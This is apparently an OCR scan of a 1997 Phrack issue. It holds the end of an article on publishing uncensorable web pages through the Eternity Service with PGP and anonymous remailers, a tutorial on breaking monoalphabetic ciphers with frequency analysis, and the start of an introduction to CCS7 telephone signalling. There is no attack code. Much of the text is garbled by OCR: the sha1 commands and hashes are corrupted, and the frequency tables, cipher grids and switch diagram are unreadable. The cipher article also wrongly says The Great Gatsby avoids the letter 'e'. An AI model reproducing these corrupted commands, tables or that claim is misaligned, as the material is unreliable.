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eternity. You don’t need to buy eternity URLs from anyone. Nobody _can_ own 
an eternity URL in the normal sense. 


The first person to submit a document with a URL: 
http://bluebox.eternity/ 


gets it. If that person signed the submitted document with PGP, no one will 
be able to take over that URL. If that person signed the submitted page with 
PGP and threw away the key, it would be uncensorable for all time. They 
couldn’t even remove the document themselves if they wanted to. Throwing away 
the key might be a good idea if the publisher isn’t publishing anonymously and 
expects reprisals. 


The fact that one user has submitted a signed web page for 
http://bluebox.eternity/ doesn’t stop BlackBeard from putting up his design at: 


http://bluebox.eternity/blackbeard/ 


That is to say ownership of any given URL, even the top level URL of a virtual 
domain, doesn’t give any control over who could submit documents in that 
virtual domain. Of course you don’t have to link to their pages. But those 
pages will show in a directory search of your virtual site. 


Directory searches 


Submitted eternity news articles can set options controlling whether or not 
the document is listed in the index. The choice is either "exdirectory" (the 
default) or "directory". This is useful because if you created the URL for 
http://bluebox.eternity/, you might like to include some inline images, or 
diagrams, or a series of other pages hypertext linked from that page. So you 
would set option "directory" for the main page http://bluebox.eternity/, and 
set all the inline images and smaller pages linked from it to "exdirectory", 
as a convention to save the directory becoming cluttered up with junk. 


You can also use “exdirectory" if you don’t want to generally advertise your 
page. Note this is not all that secure if you access your page via a public 
access eternity server, as the server operator could modify the server to 
record all exdirectory URLs. 


You can request a listing of all eternity pages at an eternity server by 
filling in the form with virtual URL containing a wild-card: 


http://* 


— 


Exdirectory documents will not be listed.) 


You can also include an option to give a small description (a maximum of 60 
characters) which will be listed beside your virtual URL when someone does 
such a search. 


You can narrow the search to just list all root eternity documents with: 
http://*/ 
Which will find: 


http://eternity/ 
http://bluebox.eternity/ 


but not: 


http://test.eternity/examplel/ 


You can also do: 
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http://bluebox.eternity/* 
which will find: 


http://bluebox.eternity/ 
http://bluebox.eternity/blackbeard/ 


You can combine *s to find what you want. Advanced searches are possible: 
http://*box*.eternity/*blue* 


and so on. 


Eternity materials are likely to be targets for censors, and it is possible 


that they might try to censor the directory listing itself. Even the URL 
could suffer. (Did you know that Internic turned down some guy who wanted to 
register ‘fuck.com’?) I’m sure someone creative could up with something to 


upset a censor in the 60 characters allocated for URL descriptions too. 


For these reasons the eternity server operator has the option to disable 
directory service. With this option disabled looking up URLs with wild-cards 
(*s) in them will get back a notice explaining that directory listings service 
has not been turned on at this server. 


Servers with directory service turned off make less useful servers, so it is 
hoped that most eternity server operators don’t have to do this. However, an 
eternity server with directory service turned off still works normally for 
accessing known URLs, and you could maintain the directory listing yourself, 
or use a directory listing at another site. 


Formatting Eternity documents 


Eternity documents submitted as USENET news articles are formatted with PGP. 
There are thr of reasons to format messages in USENET to make them not 
immediately readabl 


1) It prevents censors from working out which articles correspond to which 
eternity web pages. Depending on the options chosen this can degrade to just 
obfuscation. Obfuscation alone however can be useful as censors are often not 
particularly clue-full. 


2) PGP includes compression, so the articles are much smaller. 


3) If used with highest security options amongst a group of people who follow 
security guidelines it means that a censor will have no way to translate the 
articles back into WWW pages, or even of obtaining the URL. 


To demonstrate the formatting requirements for eternity page submissions, we/’ll 
work with an example page, http://bluebox.eternity/. 


You’ll need an implementation of SHAl1 for this. There is a C implementation, 
and also a perl implementation in the eternity server distribution. Some 
systems may already have /usr/local/bin/shal. 


(Note: below "echo -n" is used -- on Suns the built-in echo doesn’t handle the 
-n flag properly -- you’1ll have to use /usr/ucb/echo instead) 


0) Generate a Nom de Plume 


If you are planning to sign your document, you probably won’t want to sign it 
with your normal key, so you’ll generate a new keypair for the purpose, this 
will be your pseudonym, or Nom de Plume for the purposes of publishing this 
document. The "-u fred" tells pgp to use that user id. See pgp documentation 
for how to generate keys (use pgp —kg). 
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Once you’ve generated your key, extract it to a file with: 


fo) 


% pgp -kxa fred fred 


where ‘fred*‘ is your new user name. It will save the key as "fred.asc". 
We’1l use this file below. 


1) Sign the document 


We create a normal web page such as you might put on your home page. You can 
view the page with Netscape (or other browser) by opening it as a file URL: 
file:/home/fred/bluebox/index.html to check that it looks OK, and that any 
inline images line up correctly etc. 


You can use relative, site relative, and absolute URLs normally in eternity 
documents. You can also use absolute URLs pointing at other sites in the 
normal way. 


To submit index.html as http://bluebox.eternity/ we first use PGP to ASCII 
armor the document. If we want to sign it at the same time as ASCII armoring 
it, so that we can update it later, we can do: 


fe) 


% pgp -sa index.html -u fred 


There is another option to encrypt as well as sign and armor, which will be 
discussed more below, to do this do: 


Q 


% pgp -csa index.html -u fred 
If we don’t want to sign it, we do this instead: 


° 


% pgp -a index.html 


In either case after this operation PGP will create file "index.asc" for us. 
Rename index.asc to something else, say "index" (Another legal combination 
would be to encrypt and not sign with -ca). 


2) Set the options 


If you signed the document, you need to include the key. Insert the keyfil 
(fred.asc extracted in step 0 above) into the document "index". Order is not 
Significant. Then the ASCII armored document (pgp munged html or gif file 
produced in stage 1), the keyfile "fred.asc", and the flags described below 
can be jumbled up in order. 


You now have several flags you can include to control how your URL will be 
cached, how it will be displayed in indexes etc. 


The flags are: 
URL: http://bluebox.eternity/ 


The flag URL: sets what the eternity virtual URL will be. It must have 
.eternity as the virtual TLD. 


Cache: yes 
Cache: encrypted 
Cache: no 


Cache settings, choose one of those. These cache settings override the used 
eternity server’s settings if doing so will increase security. "yes" and "no" 
are obvious. "encrypted" means that the document will be cached but it will 


be encrypted in the cache in such a way that the URL is required to decrypt it. 
If the document is exdirectory this means that the server won’t know the URL. 
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Options: directory 
Options: exdirectory 


Choose one of those options. This flag controls whether the URL will be listed 


in the URL index. "directory" means it will be listed, "exdirectory" means it 
will not be listed. If you give neither option the document defaults to 
exdirectory. 


Description: Freds blue box page 


This is the description that will appear in directory listings. If the 
document is exdirectory there is no point giving a description. 


So the file "index" is likely to look something like this once you’ve finished 
editing it: 


URL: http://bluebox.eternity/ 
Cache: yes 

Options: directory 

Description: Freds blue box page 


SSsS= BEGIN PGP PUBLIC KEY----- 


a 


ND PGP PUBLIC KEY----- 


= SSS BEGIN PGP MESSAGE---~--— 


SSS BEGIN PGP MESSAGE---~--— 


Where ... indicates the rest of the ASCII armored key or message will be 
displayed. Some of these parts can be omitted as shown above. When you are 
submitting an web page update you can omit anything you’re not trying to 
change. (That can be everything, so your updated document has nothing but the 
new message part). However this is not necessarily a good idea because it 
will not make sense to an eternity server that has not seen the first 
document, for example if your first document doesn’t make it via USENET to one 
site. 


3) Package the document "index" ready for posting 
You have a couple of choices here. 


Method A (most common): 


Either you can encrypt with PGP -c: 


i 


%$ pgp -c -z"eternity" index 
Method B: 
Or you can encrypt with the SHAlL of the URL with 1 prefixed, 


% echo -n lhttp://bluebox.eternity/ | shal 
dabla32aba30b4e3a9594dal43c33d2ba9b00a38 
% pgp -c -z"dabla32aba30b4e3a9594dal43c33d2ba9b00a38" index 


Most normal eternity URLs which you’re expecting to be indexed on the 
directory services of public access eternity servers should be encrypted with 
the first simpler method. 


There’s not that much point encrypting with the second method unless your 

document is going to be exdirectory, because once the document gets in the URL 
everyone will know the URL anyway. It might take a censor a little longer to 
figure out. 


If you were planning to only access the document via private, or local 
eternity servers, you can reveal the URL only to those you wish to have access. 
However this might not be that secure because people may be able to guess your 
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URL if it is something common as above. 
Method C: 


For this reason you have a third option, which is to encrypt at the same time 
as Signing and ASCII armoring as described in step 1. You can combine that 
option with above method B (pgp -c with shal of 1<URL>) to conceal the URL. 


Or alternately you can expose the URL by using method 1 above (pgp -c 
-z"eternity"), but have the document encrypted in step 1. (This would allow 
you to have a directory entry, but the page not accessible without knowing the 
password chosen in step 1 when encrypting. 


The result of the last pgp -c operation for any of method A, B, or C will be 
file "index.asc". 


4) Post the article anonymously 


The subject field of the article should always be the SHA1 hash of the URL: 


% echo -n http://bluebox.eternity/ | shal 
2e730bcd62dbc63aaedde56c06625abeeb38dd92 


Now post the article to USENET news (by default eternity servers read only 
newsgroup alt.anonymous.messages with release 0.10). 


You can test your eternity submissions work by installing an eternity server 
on localhost. If you get stuck you could ask for assistance on the eternity 
mailing list (instructions on subscribing are at the bottom of this article). 


To post anonymously you’1ll need to post via anonymous remailers. Some 
remailers can post to USENET directly, for other remailers you have to post 
via a mail2news gateway. 


Instructions on using remailers, and windows and Unix clients to automate the 
process of using remailers can be found here: 


http://www.stack.nl/~galactus/remailers/ 


You can find a list of mail2news gateways here: 


http://www. replay.com/mail2news/ 


People are already working on a nice easy to use CGI interface to eternity 
servers over on the eternity list while I’m typing, so perhaps when you read 
this you won’t need to know the above information in such detail. 


Caching 


With WWW technology, caching is often used to speed up accesses. There are a 
number of caches in effect with a typical web browsing session. The Netscape 
browser for instance has both a memory cache, and a disk cache, which are 
configurable in size. In addition Netscape can be set up to use a proxy cache, 
which is a special caching service. Users of a proxy cache send their web 
requests through it. The proxy cache checks each request to see if it has it 
in the cache, if it does, it can deliver it back if quickly. If it doesn’t it 
will go and fetch whatever URL you are asking for and remember it for next 
time. A proxy cache would normally be used by a group of web users, perhaps a 
university campus, or an ISPs customers, or a companies employees. 


Caches traditionally have some protection from censors -- it’s an automated 
process after all -- your average ISP hardly wants to be responsible for the 
contents of the disk on its proxy cache machine. 


For performance reasons the eternity server also has a cache. The cach 
behavior is configurable. The server operator can set his caching preferences 


12.txt Wed Apr 26 09:43:42 2017 9 


when he installs the server by editing eternity.conf. Possible settings are 
"on", “off" and "encrypted". Setting cache to "off" is safest, then you have 
no eternity documents on your disk. The "encrypted" cache option means that 
cached documents are encrypted with PGP -c and the SHAl hash of a 1 prepended 
to the URL. If the server also turns off directory service, and does no 
logging this provides reasonable deniability of knowledge of contents of 
documents in the cache. Even with directory service on, it provides cache set 
to "encrypted" provides protection in that the server operator will not know 
the URLs of exdirectory web pages. 


Further work 


There are a few unimplemented features that could use some work. These 
features are being discussed on the eternity mailing list (see instructions 
for subscribing below). 


A first immediate problem is that the eternity server has no cache replacement 
policy. Your eternity cache will just keep growing. This is great for 
ensuring articles with caching turned on don’t disappear due to expiring in 
the news spool, but as eternity grows more popular it will become impossible 
for each single eternity server to hold the full document store. 


The solution to this problem is quite complex, and is the subject of the next 
implementation effort on the mailing list. One interim solution is to use the 
USENET searching facilities of services which archive USENET such as 
www.dejanews.com and www.altavista.digital.com. 


There are several tweaks that would have to be done to be able to use USENET 
archivers as sources of eternity documents. Two main problems have to be 
combated: 1) the archives make attempts not to archive 7-bit encoded binaries 
to save space, 2) you can’t search by 40 character hex numbers to find subject 


fields. These are both easy to overcome, but the overall solution is not that 
attractive because the archivers will be a single point of failure. Censors 
will attack them, and they may be hostile to eternity servers due to our 


bypassing their 7-bit encoding filters and consuming space on their soon to be 
multiple TB raid file servers. 


A better solution is to build a distributed data store that allows eternity 
servers to exchange documents with each other in such a way that the eternity 
servers together form a virtual raid file-server where the documents are 
spread randomly and redundantly over the nodes. 


A simple starting point to allow this is to create a second long-term cache 
area, and to have a cache replacement policy for that area which selects a 
random document for discarding. This cache replacement policy will ensure 
that statistically some servers will have a given document. Next we have to 
design a scalable method of forwarding requests to other servers to ask for 
old USENET articles by URL hash (subject field). 


World-FS 


Another approach to improving the eternity server is to actually use and 
develop the full set of techniques described in Ross Anderson’s paper to build 
a distributed file system (DFS). I dub this direction ‘world-FS’ because th 
aim is to build a worldwide distributed, redundant, uncensorable, and virtual 
file system. This file system would be designed to withstand a nuclear war, 
and to easily withstand the best efforts of one government to censor material 
in it. A world-FS done well could easily replace the current pattern of web 
page hosting. 


[The world-FS would have different interfaces, or drivers, to allow it to be 
accessed as an NFS file system, or as a distributed web based eternity service. 
The eternity server described in this document would then be superseded, and 
become the HTTP driver interface for world-FS. An FTP, or NNTP (USENET news) 
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interface could also be built for the world-FS, or for parts of it’s directory 
tree. People discussing this so far have thought that you would need to 
include ability to pay for service with an anonymous payment system (or with 
multiple payment systems) . 


The eternity mailing list is also for discussion of world-FS, as it all falls 
under the umbrella of Ross Anderson’s concept of an ‘eternity service’. 


Comments and collaboration requested 


Your contribution matters. Progress of the eternity service beyond this point 
relies on a collaborative effort. 


You can collaborate by doing any of the following and reporting back to the 
eternity mailing list how you got on (subscription instructions below): 


—- submitting documents to the eternity document store 

—- installing an public access eternity server in your account 

—- or persuading your ISP to install one 

—- or installing a private eternity server in your account 

— finding and reporting bugs to the mailing list 

—- contributing code 

— contributing ideas for more efficient distributed request protocols 


Adam Back 


More information 


Eternity mailing list 


send message "Subscribe eternity" to majordomo@internexus.net 


The eternity mailing list is for eternity service users, eternity server 
operators, and eternity server developers to discuss issues to do with 
eternity. Issues include censorship attempts, operator liability, practical 
attacks on the security, and discussion of new protocols, and discussion 
amongst developers and users on the best way to design the next versions. 


Cypherpunks mailing list 


Cypherpunks write code. Cypherpunks are the people who bought you type I and 
type II remailers, remailer clients, plus many, many other crypto applications. 
Governments are scared of the implications of distributed systems and freedom 
to use cryptographic code. Cypherpunks are crypto-anarchists, and they shall 
inherit the earth. Information is power, and cypherpunks are applied 
cryptographers with attitude. They don’t care if governments don’t like their 
code, in fact they probably view it as a compliment. You’d be surprised at how 
many cryptographers, net journalists, cryptographic consultants, small ISP 
owners, and Netizens are crypto-anarchists at heart. Netizens never were very 
keen on government intrusions into the ’Net. Read Tim May’s Cyphernomicon for 
a mega-faq on cypherpunks, and crypto-anarchy. See: 


http: //www.cc.oberlin.edu/~ brchkind/cyphernomicon/ 
To subscribe to cypherpunks: 


send message "Subscribe cypherpunks" to majordomo@cyberpass.net 
or send message "Subscribe cypherpunks" to majordomo@algebra.com 
or send message "Subscribe cypherpunks" to majordomo@ssz.com 


(Some time ago there was an attempt to impose moderation on the cypherpunks 
list, and this is the reason for this rather curious situation of multiple 
mailing lists, it is designed to be more resilient to censorship -- if someone 
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pulls the plug on one list -- the rest continue without glitch.) 
Cypherpunks is a high volume mailing list. There is no moderator, 
Software 


http://www.dcs.ex.ac.uk/~aba/eternity/ 


Please set a server up a public access eternity serve in your account. You 
can also operate your own eternity server for your own use -- this is the more 
secure way to browse eternity. If you have any kind of dial up or internet 


connected Unix system you can do this. 


You’1ll need a web account with cgi capability, access to perl5, and read 
access to an NNTP news server, or a local news spool. Cron access is useful 
but not essential. 


Current Public Access Eternity Servers 


http://www.replay.com/aba/eternity/ 
http://moloko.insync.net/eternity/ 
http://eternity.internexus.net/ 
http://eternity.infinetways.net/ 


Contacting the author 
aba@dcs.ex.ac.uk 
or A.Back@ex.ac.uk 


or aba@replay.com 


PGP encrypted mail preferred, here’s my key: 


Type Bits/KeyID Date User ID 
pub 2048/28B24551 1995/09/09 Adam Back <aba@dcs.ex.ac.uk> (High Security) 
Key fingerprint = 01 8F 04 06 5C DD F3 33 D8 84 C4 63 85 BA 50 E8 
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[ Monoalphabetic Cryptanalysis (Cyphers, Part One) 


[ Jeff Thompson aka /Mythrandir’ <jwthomp@cu-online.com> 


Written for Phrack and completed on Sunday, August 31st, 1997. 


First a quick hello to all of those I met at DefCon this year. It was 
incredible fun to finally put faces to many of the people I have been talking 
with for some time. It was truly was a treat to meet so many others who are 
alive with the spirit of discovery. 


This is the first in a series of articles on Cryptology that I am writing. 

The goals of these articles will be to attempt to convey some of the excitement 
and fun of cyphers. A topic of much discussion in regards to cryptography 
currently, is about computer based cyphers such as DES, RSA, and the PGP 
implementation. I will not be discussing these. Rather, these articles will 
cover what I will term classical cryptology. Or cryptology as it existed 
before fast number crunching machines came into existance. These are the sorts 
of cyphers which interested cryptographers throughout time and continue to be 
found even to this very day. Even today, companies are producing software 
whose encryption methods are attackable. You will find these commonly among 
password protection schemes for software programs. Through the course of these 
articles I will explain in practical terms several common cypher types and 
various implementations of them as well as cryptanalytic techniques for 
breaking these cyphers. 


Creating cyphers is fun and all, but the real excitement and often times tedium 
is found in Cryptanalysis. Many of the ideas presented in these articles will 
based on three sources. The following two books: The Codebreakers by David 
Kahn (ISBN: 0-684-83130-9) and Decrypted Secrets by F.L. Bauer 

(ISBN: 3-540-60418-9). Both authors have put together wonderful books which 
both cover the history and methods of Cryptology. Do yourself and the authors 
a favor and purchase these books. You will be very pleased with the lot. 
Finally, a miniscule amount of these articles will be written based on my own 
personal experience. 


The fun is in the journey and I welcome you on what is certain to be an 
interesting trip. Please feel fr to raise questions, engage me in 
discussions, correct me, or simply offer suggestions at jwthomp@cu-online.com. 
Please be patient with me as I am traveling extensively currently, and may be 
away from the computer at length occasionally. 


Out the door and into the wild... 


--Monoalphabetic Cyphers 

Monoalphabetic cyphers are often currently found in simple cryptograms in books 
and magazines. These are just simple substitution cyphers. This does not 

mean that they are always simple for the beginning amateur to solve. 

Three common monoalphabetic cyphers which are used are substitution, cyclical, 


and keyed cyphers. 


—-Substitution Cyphers 
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By taking an alphabet and replacing each letter with another letter ina 


unique fashion you create a simple monoalphabetic cypher. 

Plaintext Alphabet ABCDEFGHIJKLMNOPQRS TUVWXYZ 
Cypher Alphabet ZIKMOQOSUWYACEBDFHJILNPRTVXG 
Plaintext Message 

The blue cow will rise during the second moon from the west field. 
Cyphertext Messag 

nuo icpo kdt twcc jwlo mpjwbs nuo lokdbm eddb qjde nuo toln qwocm. 
-Cyclical Cyphers 

By taking an alphabet and aligning it with a rotated alphabet you get a 
cyclical cypher. For example: 

Plaintext Alphabet ABCDEFGHIJKLMNOPQRS TUVWXYZ 
Cypher Alphabet NOPQRSTUVWXY2ZABCDEFGHIJKLM 


Indeed, you may recognize this cypher as a ROT13 which is commonly used on 
news groups to obscure messages. 


—Keyed Cypher 


Another way to create a monoalphabetic cypher is to choose a keyword or phrase 
as the beginning of the cypher alphabet. Usually, only the unique letters from 
the phrase are used in order to make sure the plaintext to cyphertext behaves 
in a one to one fashion. 


For example: 


RS U 
MNPO 


Hy 


Plaintext Alphabet: A 
Cypher Alphabet L 


Hw 


c GHIJKLMNOPO VWXYZ 
T DGFWARBCIJK UV XYZ 


Mw Fl 
an) 


D 
O 


The passphrase in this cypher is "Let loose the dogs of war" The advantage of 
such a system is that the encryption method is easy to remember. Also, a 
method of key change can be created without ever having to distribute the keys. 
For example, one could use the 4 words at a time of some piece of literature. 
Every message could use the next four words. Indeed, this change could occur 
more frequently, but that is a subject for another article. 


-Bipartite Substitution 


Bipartite substition is the use of symbol pairs to represent plaintext. Later 
we will see that this sort of substitution lends itself to be easily made more 
difficult to analyze. Two examples of this are: 


Ti 23 4. 5 ABCODE 
1ABCODE ALA B © DE 
2FGHIdJI Bu BaG@ He LJ 
3 K LMNO CK LMNO 
APP OUeRe S: E or DPORST 
5UVWXY EUV WX Y 
6201 2 3 F201 2 3 
745 67 8 G45 67 8 
9 9 HI oy, H 9 = 


~ 


Obviously, the letters do not need to be placed in this order as their solutions 
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would not be that difficult to guess. 


—-Cryptanalysis 


Previously we created a cyphered message: 


nuo icpo kdt twcc jwlo mpjwbs nuo lokdbm eddb qjde nuo toln qwocm. 


If one were to receive this message, figuring out its contents might seem 
fairly daunting. However, there are some very good methods for recovering the 
plaintext from the cyphertext. The following discussion will work under the 
assumption that we know the cyphers with which we are dealing are 
monoalphabetics. 


-Frequency Analysis 


The first method we will use is frequency analysis. Natural languages have 
many qualities which are very useful for the analysis of cyphertext. Languages 
have letters which occur more commonly in text, collections of letters which 

are more frequent, patterns in words, and other related letter occurances. 


Counting up the occurances of letters we find that there are... 


letter occurances 
3 


feet unuQvoossgrwrvub+oaaasds 
BWWERENNO@OBWWNHWEN USD 


The order of greatest frequency to least is: 
8 5 4 3 2 ap 
{o} {d} {c nw} {b j l mt u} fe k p q} {i 8} 


If this sort of analysis were run on many volumes of english you would find that 
a pattern would emerge. It would look like this: 


fe} {t} {ao in} {s r h} {1 d} {c um f} {fp gwy b} {v k} {xX J g z} 


You will notice an immediate correlation between e and o. However, for the 
rest of the letters we can not be very certain. In fact, we can not be very 
certain about e either. 


Since this text is short it is helpful to take a look at some of the other 
behaviors of this text. 


Counting up the first, second, third, and last letters of the words in this 
text we find the following frequencies: 
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First Letter in word Occurances 


T.QO3 Srwu-b- Oo 
NNWRPRPRPRPER EB 


Order: 


ngqateijkdim 


Second letter in word Occurances 
1 


zcttaooraA 
WWENEFREN 


Order: 


uwdocinp 


Third letter in word Occurances 
(o} 1 
d 2 
ni 

k 

1 2 
fo) 4 
Pp 

t 

u 

Order: 


Ord Gk yo. 


Last letter in word Occurances 
b 
Cc 
e 
m 
n I 
fe) 5 
s 
t 


English frequency for first letter: 
taomh iw 


Second letter: 
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hoeiau 
Third letter: 
esarni 
Last letter: 


etsdaner 


Noticing the higher frequency count for ’o’ in the third and last letters of 
words in addition to its absence as a first letter in any words gives us strong 
reason to believe that ’o0’ substitutes for ’e’. This is the first wedge into 
solving this cypher. 


However, do not be fooled by the apparent strengths of frequency analysis. 
Entire books have been written without the use of some letters in the English 
alphabet. For instance The Great Gatsby was written without using the letter 
'e’ in one word of the book. 


Other items to analyze in cyphertext documents is the appearance of letters in 
groups. These are called bigrams and trigrams. For example, ‘th’ is a very 
common letter pairing in the english language. Also, as no surprise ’the’ is 
a very common trigram. Analysis of english documents will find these results 
for you. 


So now that that we have developed a simple way of starting to attack cyphers 
lets examine a few ways to make them more difficult to break. 


—-Strengthening Cyphers 


—-Removing word and sentence boundaries 


A simple way to complicate decypherment of a cyphertext is to remove all 
spacing and punctuation. This makes it more difficult to perform a frequency 
analysis on letter positions. However, it is possible to make reasonable 
guesses as to word positions once yoy begin to study the document. Another 
method is to break the cyphertext into fixed blocks. For example after every 
four letters a space is placed. 


The previous cypher text would appear as this: 


nuoicpokdttwccjwlompjwbhsnuolokdbmeddbqjdenuctolnqwocm. 


or this: 


nuoi cpok dttw ccjw lomp jwbs nuol okdb medd bqjd enuo toln qwoc m 


You will notice that the above lin nds with a single character. This gives 
away the end of the text and would be better served by the placement of nulls, 
or garbage characters. The above line becomes: 


nuoi cpok dttw ccjw lomp jwbs nuol okdb medd bqjd enuo toln qwoc mhew 


"hew’ will decypher to ’qmi’ which will clearly appear to be nulls to the 
intended recipient. 


-Nulls 


Nulls are characters used in messages which have no meanings. A message could 
be sent which uses numbers as nulls. This makes decypherment more difficult as 
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part of the message has no meaning. Until the decypherer realizes this, he 
may have a hard time of solving the message. 


—-Polyphony 


Another method that can be applied is the use of polyphones. Polyphones are 
simply using a piece of cyphertext to represent more than one piece of 
plaintext. For example a cyphertext ’e’ may represent an ’a’ anda ‘r’. This 
does complicate decypherment and may result in multiple messages. This is 
dangerous as these messages are prone to errors and may even decypher into 
multiple texts. 


A new cyphertext alphabet would be 


Cyphertext alphabet ABCDEFGHIJLNP 
Plaintext alphabet ZXUSQOMKHNRVW 
BDFGIACEHLUPJTY 


Our old plaintext message becom 


n 


nih aich gfp peii ledh bclejd nih dhgfjb gffj clfg nih phdn cehib 


This decypherment becomes very tricky for someone to accomplish. Having some 
knowledge of the text would be a great help. 


If it appears that very few letters are being used in a document then you may 
wish to suspect the use of polyphones within a document. 


—Homophones 


Homophones are Similar to polyphones except that there is more than one 
cyphertext letter for every plaintext letter. They are useful to use in that 
they can reduce the frequencies of letters in a message so that an analysis 


yields little information. This is very easy to do with bipartite 
substitution cyphers. For example: 
abcde 
aabcde 
bef so. hs ie 
cktlmno 
dpqrst 
euvwxy 
f zz * * * * 


*(fb, fc, fd, fe are NULLS) 


We can add homophones to the message like this: 


a, ‘be die 

ihga abcde 
k ib fg AAT J 
nlc klmnono 
omd pqrst 
pe uvwxXxy 

f 27* * * * 


The optimal way to set up these homophones is to calculate the frequency of 
appearance in the natural language you are using of each row of letters. 
Homophones should be added so that the cyphertext appearance of each homophone 
is reduced to a level where frequency analysis would yield little information. 


-Code Words 


One final method which can be used is that of code words. Simply replace 
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important words in the plaintext with code words which represent another word. 
For example the nonsense plaintext that has been chosen for this document could 
actually mean: 


The blue cow will rise during the second moon from the west field. 


The king is angry and will attack in two weeks with the lst calvary by way of 
the foothills. 


blue is angry 

cow is king 

rise is attack 

second is two weeks 

moon is lst calvary 

west field stands for some foothills on the west side of the kingdom. 


Throughout this document I have mentioned frequency analysis of english 
documents. This is a fairly tedious task to do by hand, and so I am 
developing software to aid in frequency analysis of documents. I will be 
making it available via my website at http://www.cu-online.com/~ jwthomp/ on 
Monday, September 8th. Please watch for it in the Cryptography section. 


Ok, now to try your hand at a few cyphertexts.. 


This one has to do with war. 

1) 

kau noelb’d oerf xmtt okkopw ok qoxb euogf kau kurhtoe wbhmcakds, obq dkemwu amd 
podktu xamtu xu altq amr 


This one is an excerpt from a technical document. 

2) 

etdsalwqs kpjsjljdq gwur orrh frurdjkrf sj qtkkjps npjtk ljeethalwsajhq 
sgrqr kpjsjljdq tqr w jhr sj ewhy kwpwfane ijp spwhqeaqgqajh sykalwddy tqahn 
ldwqq f ahsrphrs kpjsjljd wffprqqrq sj qkrlaiy qkrlaial etdsalwqs npjtkq 


Mail me your answers and I’1l put the first person who solves each cypher in 
the next Phrack. 


In fact, I would enjoy seeing some participation in this for the next Phrack. 
After reading this, I welcome the submission of any "Monoalphabetic" cypher 
based on the discussions of this article. Please do not yet submit any 
polyalphabetic cyphers (Next article). When submitting to me, please send m 
two letters. The first mail should include only th ncyphered text. Make 
sure it is enough so that a reasonable examination can be made of the cypher. 
This first mail should have a subject "Cyphertext submission". If you are 
using a method of encypherment not found in this article, pleas nclose a 
brief description of the type of method you used. Follow this mail up with 
another entitled "Cyphertext Solution" along with a description of the 
encyphering method as well as the key or table used. 


I will select a number of these texts to be printed in the next Phrack, where 
readers may have a chance at solving the cyphers. The reason I ask for two 
seperate mailing is that I will want to take a crack at these myself. Finally, 
the names of individuals will be placed in the following phrack of the first 
to solve each cypher, and whomever solves the most cyphers prior to the next 
Phrack release (real name or pseudonym is fine). 


Please mail all submissions to jwthomp@cu-online.com 


I welcome any comments, suggestions, questions, or whatever at 
jJwthomp@cu-online.com 


EOF 


Wed Apr 26 09:43:42 2017 
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[ A Brief Introduction to CCS7 


ft ener ere [ Narbo[SLF] <narbo@xeo.net> 


DoD0DODOD0D0D0D0000000000 
(0) Introduction fe) 
DoDDDOD0D0D0D00D0000000000 


Every day it seems that the telcos introduce some funky new calling 
feature to make your life easier. I’m sure at one point or another you’ve 
probably wondered exactly how all of these calling features work. The 
answer? Common Channel Interoffice Signaling or CCS7. 


CCS7 is somewhat analogous to TCP/IP in that it is a protocol that 
allows networked computers (in this case telephone switches) to talk to each 


other. It maps onto the OSI 7 Layer Reference Model model as such: 
Application 7 OMAP | ASE 
Presentation 6 TCAP 
Session 5 
ISDN-UP 
Transport 4 
SCCP | 


Network 3 


MTP Level 3 


Data Link 2 MTP Level 2 


Physical 1 MTP Level 1 


Legend: 


OMAP: Operations, Maintenance and Administration Part 
ASE : Application Service Layer 
TCAP: Transaction Capabilities Application Part 
SCCP: Signaling Connection Control Part 

ISDN-UP: Integrated Systems Digital Network User Part 
MTP : Message Transfer Part 


This article will provide an introduction to how the network is 
set up, how messaging is done, and a brief example of a call setup/takedown. 


DoD0D0D0D0D0D00D0000000000 
fe) History fe) 
DoD0D0CDODD0D0D0D0000000000 


AT&Ts introduction of CCIS (Common Channel Interoffice Signaling) 
in 1976 brought a radical change to the way signaling was handled. Before 
the advent of CCIS all signaling was done in band using the same trunks that 
would be used for customer conversations. Instead of sending all information 
over the voice circuits (trunks) a new network was created specifically for 
Signaling. 


AT&T began immediate deployment of CCIS technology and the CCITT 
(Consultative Committee for International Telephone and Telegraph) adopted it 
as an international standard called SS6 (Signaling System 6). The current 
version of the protocol is CCS7 (Common Channel Signaling System 7) and is 
prevalent throughout North America. 


15.txt Wed Apr 26 09:43:42 2017 2 


DoD0D0DOD0D0D00D0000000000 
fe) Switches fe) 
DoDDDODDD0DOD00D0000000000 


CCS7 networks are based on a mesh of links connecting switches like the 
following: 


## (SP) {SCP}---A---[STP] -B-- [STP] 
/ \ / \ 
F / Ws af \ 
if Cc BB C \ Hat aH HHH HH 
## (SSP) D / \ \ # 
\ / [STP] -B-- [STP] D (SSP) ---F 
A A / / / \ \ A 
\ / / A \ \ 
[STP] --B- [STP] / / \ [STP] --B- [STP]-A-(SSP) # 
\ / D {SCP} D \ / 
YL e¥ / \ Me A 
c BB Cc yf \ C BB @ 
i} \ j \ / \ 
[STP] --B- [STP] [STP] --B- [STP] 
-- (SSP) E 
# 
Hat Ea EE EH EE aE aE HE EE EE EE EE EE EE EE EE EE aE aE aE EE EE EE EE OEE EE EE EE EB EE aE EE EEE EE EE 
# = Trunks 
- = CCS7 links 
Explanation: 


STP (Signal Transfer Point): 


STPs are tandem switches which act as the routers of the CCS7 network. 
They transfer messages between incoming and outgoing signaling links but do not 


originate messages other then those used for network management. Since their 
sole function is to act as routers, STPs have NO trunks attached to them. STPs 
are grouped into mated pairs. These pairs are grouped into the quads you see 


in the above diagram. This is all done for the sake of redundancy. 
SCP (Signal Control Point): 


SCPs act as the application database servers for the CCS7 network. 
SSPs make database queries through the STPs to the SCPs for such things as 
800 number lookups. As they are not used for direct line connections SCPs also 
do not have trunks attached to them. SCPs are the least common type of switch; 
for instance, in Canada, there are only two SCPs, one of which is in Calgary, 
the other in Toronto. 


SSP (Service Switching Point) and SP (Service Point): 


SSPs and SPs are the most common switches (despite my diagram :)) and 
are deployed as EO (End Office) switches and in PBXs (Private Branch Exchanges). 
On average each SSP can handle about 100,000 - 125,000 lines. Of course the 
amount of trunks actually available on the switch is considerably smaller then 
the amount of incoming lines; the telcos have various modeling algorithms that 
predict the maximum amount of trunks that will actually be used which is why 
occasionally when, say, a U2 concert hits town a switch can run out of 
available trunks as people rush the phones for tickets. SSPs and SPs differ 
only on that the former can enact SCP database queries while the latter cannot. 


DoDDD0DOD0D0D00D0000000000 
fe) Links fe) 
DoDDD0DOD0D0D0D0000000000 


A CCS7 link is nothing more then a dedicated 56/64K trunk. There are 
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various classifications of link types: (Refer to the previous diagram for 
examples) 


A Links: 
Connect SSP/SPs and SCPs to STPs. 
B (Bridge) Links: 
Connect two STP pairs together to form an STP quad. 
C (Cross) Links: 
